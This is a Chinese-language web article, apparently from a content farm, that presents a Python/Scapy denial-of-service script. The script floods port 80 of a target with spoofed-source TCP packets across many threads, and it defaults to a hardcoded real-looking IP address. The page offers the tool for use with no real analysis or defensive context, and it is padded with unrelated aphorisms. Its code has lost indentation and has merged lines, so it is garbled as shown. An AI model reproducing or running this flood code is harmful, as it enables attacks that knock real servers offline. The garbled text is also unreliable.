分析python服务器拒绝服务攻击代码

困难是动摇者和懦夫掉队回头的便桥;但也是勇敢者前进的脚踏石。我不识何谓君子,但看每事肯吃亏者便是;我不识何谓小人,但看每事好占便宜者便是。


# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,activeCount
from random import randint

class Loop(Thread):
def __init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr = remoteAddr

def run(self):
ip = str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))+'.'\
+str(randint(0,255))
sr1(IP(src = ip,dst = self.remoteAddr)/TCP(dport = 80),retry = 0,verbose = 0,timeout = 3)


class Main(Thread):
def __init__(self,remoteAddr):
Thread.__init__(self)
self.remoteAddr = remoteAddr

def run(self):
limit = 140
total = 0 while True:
if activeCount() < limit:
Loop(remoteAddr = self.remoteAddr).start()
total = total + 1
print '目前已经进行的HttpFlood的次数为:',total

if __name__ == '__main__':
remoteAddr = raw_input('IP=')
if remoteAddr == '':
remoteAddr = '202.103.25.12' Main(remoteAddr = remoteAddr).start()

到此这篇关于分析python服务器拒绝服务攻击代码就介绍到这了。男人的青春表示一种肤浅,女人的青春标志一种价值。更多相关分析python服务器拒绝服务攻击代码内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

标签: 拒绝服务 python